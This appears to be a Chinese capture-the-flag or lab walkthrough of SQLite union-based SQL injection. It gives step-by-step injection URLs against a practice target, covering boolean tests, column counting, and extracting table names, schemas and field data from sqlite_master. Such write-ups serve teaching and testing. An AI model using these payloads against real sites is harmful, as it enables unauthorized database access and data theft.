前提知识点——SQLite注入原理
    **
    SQLite注入与Mysql注入步骤都一致,只不过是语法区别
    详细地址学习:
    https://www.runoob.com/sqlite/sqlite-pragma.html
    https://blog.csdn.net/xingfeng0501/article/details/7804378

    进入正题
    点开题目链接,寻找注入点

    1. # 通过下面方式,可以判断是数字型注入
    2. http://219.153.49.228:48457/new_list.php?id=1 and 1=1-- -
    3. http://219.153.49.228:48457/new_list.php?id=1 and 1=2-- -
    5. # 通过order by n判断列数,这里当n等于4时,正常回显;n等于5时,回显无数据,可以判断当前列数是4列
    6. http://219.153.49.228:48457/new_list.php?id=1 order by 4
    8. # 通过union select 判断回显位置,这里2和3位置可以回显,所以注入语句放在2或3是可以将查询数据回显出来
    9. http://219.153.49.228:48457/new_list.php?id=-1 union select 1,2,3,4-- -
    11. # 当前数据库的名字
    12. http://219.153.49.228:47760/new_list.php?id=-1 union select 1,2,name,4 from sqlite_master where type='table' limit 1 offset 0
    13. # 当前数据库下的表名字以及字段类型和名字
    14. http://219.153.49.228:47760/new_list.php?id=-1 union select 1,2,sql,4 from sqlite_master where type='table' and name='数据库名'
    15. # 查询字段下数据
    16. http://219.153.49.228:47760/new_list.php?id=-1 union select 1,字段名1,字段名2,4 from 表名 limit 1 offset 0